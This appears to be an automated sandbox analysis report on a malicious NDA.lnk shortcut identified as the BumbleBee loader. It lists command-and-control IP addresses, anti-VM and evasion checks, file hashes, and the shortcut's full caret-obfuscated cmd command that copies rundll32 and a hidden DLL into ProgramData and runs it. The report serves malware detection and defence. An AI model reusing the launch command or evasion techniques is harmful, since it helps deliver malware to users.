Overview

overview

10

Static

static

1

NDA.lnk

windows7-x64

10

NDA.lnk

windows10-2004-x64

10

creator.dll

windows7-x64

1

creator.dll

windows10-2004-x64

1

Analysis

  • max time kernel
    136s
  • max time network
    155s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • submitted
    29-11-2024 13:02

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    NDA.lnk

Score
10/10
bumblebee0310evasionloader

Malware Config

Extracted

Family

bumblebee

Botnet

0310

C2

146.59.117.200:443

192.255.188.11:443

149.3.170.62:443
rc4.plain

Signatures

  • BumbleBee

    BumbleBee is a loader malware written in C++.

    loaderbumblebee
  • Bumblebee family
    bumblebee
  • Enumerates VirtualBox registry keys 2 TTPs 5 IoCs
    evasion
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs
    evasion
  • Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
    evasion
  • Checks BIOS information in registry 2 TTPs 3 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Identifies Wine through registry keys 2 TTPs 1 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

    evasion
  • Loads dropped DLL 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\NDA.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3444
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c start /b /min xco^py /y C:\Windows\System32\rund*.exe c:\programdata && start /b /min xco^py /h /y cr^eat^or.dll c:\programdata && cd c:\programdata && timeout 1 && start /b /min r^u^ndll32.exe creator.dll,runprog && exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4536
      • C:\Windows\system32\xcopy.exe
        xcopy /y C:\Windows\System32\rund*.exe c:\programdata
        3⤵
          PID:1964
        • C:\Windows\system32\xcopy.exe
          xcopy /h /y creator.dll c:\programdata
          3⤵
            PID:3456
          • C:\Windows\system32\timeout.exe
            timeout 1
            3⤵
            • Delays execution with timeout.exe
            PID:5116
          • \??\c:\ProgramData\rundll32.exe
            rundll32.exe creator.dll,runprog
            3⤵
            • Enumerates VirtualBox registry keys
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Looks for VirtualBox Guest Additions in registry
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Loads dropped DLL
            • Suspicious use of NtCreateThreadExHideFromDebugger
            • Checks for VirtualBox DLLs, possible anti-VM trick
            • Suspicious behavior: EnumeratesProcesses
            PID:640

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\ProgramData\rundll32.exe
        Filesize

        70KB

        MD5

        ef3179d498793bf4234f708d3be28633

        SHA1

        dd399ae46303343f9f0da189aee11c67bd868222

        SHA256

        b53f3c0cd32d7f20849850768da6431e5f876b7bfa61db0aa0700b02873393fa

        SHA512

        02aff154762d7e53e37754f878ce6aa3f4df5a1eb167e27f13d9762dced32bec892bfa3f3314e3c6dce5998f7d3c400d7d0314b9326eedcab72207c60b3d332e

        Download Submit

      • \??\c:\ProgramData\creator.dll
        Filesize

        2.8MB

        MD5

        f7e264d654ad023794222f1e2fa866e6

        SHA1

        0f5a405879ce713986b4940a51158bd2ee99e750

        SHA256

        177a9689065b14408eb7af71432ec9a621d56fba5182cd74f3690e989a95d023

        SHA512

        82bd12740934ff7608419770fd205f0ddd57bd418ecee827834866414cda9265e9600ad7931097942838df4dddcc751c0e31b1e5736c4e3f52e054c5e7bf2f6b

        Download Submit

      • memory/640-11-0x00007FFED88AD000-0x00007FFED88AE000-memory.dmp

        Filesize

        4KB

        Download

      • memory/640-12-0x000002022E7E0000-0x000002022E933000-memory.dmp

        Filesize

        1.3MB

        Download

      • memory/640-14-0x00007FFED8810000-0x00007FFED8A05000-memory.dmp

        Filesize

        2.0MB

        Download

      • memory/640-13-0x00007FFED8810000-0x00007FFED8A05000-memory.dmp

        Filesize

        2.0MB

        Download

      • memory/640-16-0x00007FFED8810000-0x00007FFED8A05000-memory.dmp

        Filesize

        2.0MB

        Download

      • memory/640-15-0x00007FFED8810000-0x00007FFED8A05000-memory.dmp

        Filesize

        2.0MB

        Download

      • memory/640-17-0x000002022E7E0000-0x000002022E933000-memory.dmp

        Filesize

        1.3MB

        Download

      • memory/640-18-0x000002022E7E0000-0x000002022E933000-memory.dmp

        Filesize

        1.3MB

        Download

      • memory/640-19-0x00007FFED88AD000-0x00007FFED88AE000-memory.dmp

        Filesize

        4KB

        Download

      • memory/640-20-0x00007FFED8810000-0x00007FFED8A05000-memory.dmp

        Filesize

        2.0MB

        Download

      • memory/640-21-0x000002022E7E0000-0x000002022E933000-memory.dmp

        Filesize

        1.3MB

        Download